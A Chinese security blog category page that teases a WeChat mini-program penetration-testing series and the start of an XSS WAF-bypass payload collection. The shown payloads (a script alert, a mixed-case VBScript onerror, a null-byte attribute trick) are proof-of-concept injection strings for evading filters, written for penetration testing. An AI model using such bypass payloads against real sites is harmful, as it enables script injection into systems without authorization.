分类 技术分享 下的文章

微信小程序的渗透五脉

banner

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

全文共五篇章节,分别是:寻魔篇、访道篇、如意篇、修仙篇、降妖篇,均首发于“雷神众测”公众号具有原创声明。本文全长2万余字,预计阅读时间50分钟,请做好准备。

- 阅读剩余部分 -

XSS绕waf合集

往事只能回味,我已近完全忘却了,原来我还发过这样一篇文章,一次数据库的丢失并未让我失去这些美好的回忆。原来,这边是曾今的一切。。。继续保持当年的那份初心吧,感谢Web ARCHIVE(https://web.archive.org/web/20160830125339/http://www.hackinn.com/index.php/archives/44/) ,于2020年初夏

在一个有效的xss集合中,我们发现渗透测试十分的有用,特别是在当有waf或者黑名单过滤时,但并不像你用AK-47在空中扫射一样容易。

简单字符操作。
请注意,我用十六进制表示的字符,但你不可能把它打出来。例如,\x00等于一个空字节,但在运用中使用哪种编码还要看实际情况(URL编码\x00=%00)。

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<script>alert(1)</script>
<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" language="VbS" onerror="mSgbOx(1)">

零字节字符之间的HTML属性名称、等号(IE,Safari)。
<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror\x00="alert(0)"/>

- 阅读剩余部分 -